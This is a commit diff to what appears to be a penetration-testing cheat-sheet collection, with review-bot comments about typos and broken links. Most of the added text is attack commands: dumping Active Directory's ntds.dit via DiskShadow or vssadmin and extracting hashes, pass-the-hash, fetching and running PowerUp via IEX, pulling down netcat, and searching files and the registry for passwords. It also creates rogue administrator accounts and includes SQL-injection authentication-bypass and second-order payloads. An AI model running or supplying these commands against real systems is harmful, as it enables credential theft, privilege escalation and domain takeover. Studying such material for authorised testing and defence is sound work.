synced 2025-03-04 23:37:35 +00:00
Windows PrivEsc + SQLi second order + AD DiskShadow
6 changed files with 215 additions and 17 deletions
@ -39,6 +39,7 @@ crackmapexec -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M met
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(''); Invoke-AllChecks"
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('');"
* [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script)
## Most common paths to AD compromise
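Review bot: both `IEX (New-Object Net.WebClient).DownloadString('')` lines carry an empty URL string, so as written they download nothing; put a clearly marked placeholder such as `'<URL to PowerUp.ps1>'` in the quotes, and give the second line a description of which script it is meant to load, since the first line already covers PowerUp's `Invoke-AllChecks`.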
@ -82,36 +83,59 @@ Get-NetGPOGroup
### Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit)
**Using ndtsutil**
ntdsutil: activate instance ntds
ntdsutil: ifm
ifm: create full c:\pentest
ifm: quit
ntdsutil: quit
**Using Vshadow**
vssadmin create shadow /for=C :
Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit
**Using DiskShadow (a Windows signed binary)**
diskshadow.txt contains :
set context persistent nowriters
add volume c: alias someAlias
expose %someAlias% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
delete shadows volume %someAlias%
diskshadow.exe /s c:\diskshadow.txt
dir c:\exfil
reg.exe save hklm\system c:\exfil\system.bak
**Extract hashes from ntds.dit**
then you need to use secretsdump to extract the hashes
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
Metasploit module
**Alternatives - modules**
Metasploit modules
PowerSploit module
Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit
### Golden Tickets
Forge a TGT, require krbtgt key
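Review bot: the `diskshadow.txt` script is missing the `create` command between `add volume c: alias someAlias` and `expose %someAlias% z:`; `add volume` only queues the volume for the shadow set, so without `create` there is no shadow copy for `expose` to mount and the copy step fails (the referenced bohops post includes it). Also fix `ndtsutil` to `ntdsutil` in the sub-heading, `/for=C :` to `/for=C:` (the stray space breaks the vssadmin argument), and align the file names in the last step: `reg.exe save` writes `c:\exfil\system.bak` while the secretsdump line reads `-system SYSTEM`. The lone `Metasploit module` line above `**Alternatives - modules**` looks like a leftover, and neither Metasploit entry names a module.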
@ -267,4 +291,5 @@ net group "Domain Admins" hacker2 /add /domain
* [Pen Testing Active Directory Environments - Part V: Admins and Graphs](https://blog.varonis.com/pen-testing-active-directory-v-admins-graphs/)
* [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/)
* [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/)
*[Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
*[Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
* [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/)
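Review bot: the `Fun with LDAP, Kerberos (and MSRPC) in AD Environments` bullet still has no space between `*` and `[`, so it does not render as a list item and the old and new lines differ only in whitespace; write it as `* [Fun with LDAP, Kerberos (and MSRPC) in AD Environments](...)` to match the surrounding entries.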
Methodology and Resources/Windows - Privilege Escalation.md
Normal file
@ -0,0 +1,157 @@
# Windows - Privilege Escalation
Almost all of the following commands are from [The Open Source Windows Privilege Escalation Cheat Sheet](https://addaxsoft.com/wpecs/)
## Windows Version and Configuration
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
List all env variables
List all drives
wmic logicaldisk get caption || fsutil fsinfo drives
## User Enumeration
Get current username
echo %USERNAME% || whoami
List all users
net user
whoami /all
List logon requirements; useable for bruteforcing
net accounts
Get details about a user (i.e. administrator, admin, current user)
net user administrator
net user admin
net user %USERNAME%
List all local groups
net localgroup
Get details about a group (i.e. administrators)
net localgroup administrators
## Network Enumeration
List all network interfaces
ipconfig /all
List current routing table
route print
List the ARP table
arp -A
List all current connections
netstat -ano
List firware state and current configuration
netsh advfirewall firewall dump
List all network shares
net share
## Looting for passwords
Search for file contents
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
Search for a file with a certain filename
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
Search the registry for key names
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
Read a value of a certain sub key
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
## Processes Enum
What processes are running?
tasklist /v
Which processes are running as "system"
tasklist /v /fi "username eq system"
Do you have powershell magic?
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
## Uploading / Downloading files
a wget using powershell
powershell -Noninteractive -NoProfile -command "wget https://addaxsoft.com/download/wpecs/wget.exe -UseBasicParsing -OutFile %TEMP%\wget.exe"
wget using bitsadmin (when powershell is not present)
cmd /c "bitsadmin /transfer myjob /download /priority high https://addaxsoft.com/download/wpecs/wget.exe %TEMP%\wget.exe"
now you have wget.exe that can be executed from %TEMP%wget for example I will use it here to download netcat
%TEMP%\wget https://addaxsoft.com/download/wpecs/nc.exe
## Spot the weak service using PowerSploit's PowerUP
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
## Thanks to
* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
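Review bot: under `## Windows Version and Configuration`, `List all env variables` has no command beneath it, while every other description in the file is paired with one (`set` is the cmd equivalent). Typos to fix: `firware` in `List firware state and current configuration` should be `firewall`, `useable` should be `usable`, and `%TEMP%wget` in the sentence under `## Uploading / Downloading files` is missing its backslash (`%TEMP%\wget`).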
@ -1,9 +1,14 @@
# Windows - Using credentials
Little tip, if you don't have credentials yet :D
net user hacker hacker /add
net localgroup administrators hacker /add
Some info about your user
net user /dom
net user /domain
## Metasploit - SMB
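Review bot: `Some info about your user` is followed by `net user /domain`, which lists every account in the domain rather than details of the current user; either change the description to `List all domain users` or query the account explicitly with `net user %USERNAME% /domain`. The `/dom` to `/domain` change itself is fine (both are accepted; the full switch is clearer).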
@ -1,6 +1,6 @@
## PostgreSQL Comment
## PostgreSQL Comments
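Review bot: renaming the heading to `PostgreSQL Comments` changes its generated anchor from `#postgresql-comment` to `#postgresql-comments`; check that the file's summary links and any cross-references from the other SQL injection pages still resolve after the change.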
@ -2,13 +2,19 @@
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
## Summary
* [Entry point detection](#)
* [DBMS Identification](#)
* [SQL injection using SQLmap](#)
* [Authentication bypass](#)
* [Polyglot injection](#)
* [Insert Statement - ON DUPLICATE KEY UPDATE](#)
* [WAF Bypass](#)
* [CheatSheet MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/MSSQL%20Injection.md)
* [CheatSheet MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md)
* [CheatSheet OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/OracleSQL%20Injection.md)
* [CheatSheet PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/PostgreSQL%20Injection.md)
* [CheatSheet SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/SQLite%20Injection.md)
* [Entry point detection](#entry-point-detection)
* [DBMS Identification](#dbms-identification)
* [SQL injection using SQLmap](#sql-injection-using-sqlmap)
* [Authentication bypass](#authentication-bypass)
* [Polyglot injection](#polyglot-injection-multicontext)
* [Second order injection](#second-order-injection)
* [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update)
* [WAF Bypass](#waf-bypass)
## Entry point detection
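Review bot: the new anchors are GitHub's auto-generated heading slugs, so each resolves only if the heading text matches exactly: `#polyglot-injection-multicontext` requires a heading reading `## Polyglot injection (multicontext)`, and `#insert-statement---on-duplicate-key-update` (triple hyphen) is correct for `## Insert Statement - ON DUPLICATE KEY UPDATE`. The five `CheatSheet ... Injection` entries point at absolute `github.com/swisskyrepo/.../blob/master/...` URLs; relative links such as `MSSQL%20Injection.md` would keep them working on forks, mirrors and other branches.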
@ -275,6 +281,11 @@ admin") or "1"="1"/*
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
## Second order injection
admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
## Insert Statement - ON DUPLICATE KEY UPDATE
ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by:
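Review bot: `## Second order injection` consists of a single payload with no explanation, unlike the neighbouring sections; add a sentence stating that the payload is stored by one request (for example as a username) and is only executed later, when the application builds a second query from the stored value, and say what the two UNION columns represent (a username and its MD5 password hash) so the reader understands why that row is returned.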
@ -392,7 +403,7 @@ mysql> mysql> select version();
- [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
- [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
- [The SQL Injection Knowledge base](https://websec.ca/kb/sql_injection)
- [EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (http://evilsql.com/main/page2.php)
- [PentestMonkey's MSSQL SQLi injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
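Review bot: three reference entries (`Reiners mySQL injection Filter Evasion Cheatsheet`, `EvilSQL's Error/Union/Blind MSSQL Cheatsheet` and `PentestMonkey's MSSQL SQLi injection Cheat Sheet`) have a space between `]` and `(`, which stops Markdown from rendering them as links; remove the space. The PentestMonkey title also repeats "injection" (`SQLi injection`); `MSSQL SQL injection Cheat Sheet` reads better.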
@ -1,6 +1,6 @@
# SQLite Injection
## SQLite comment
## SQLite comments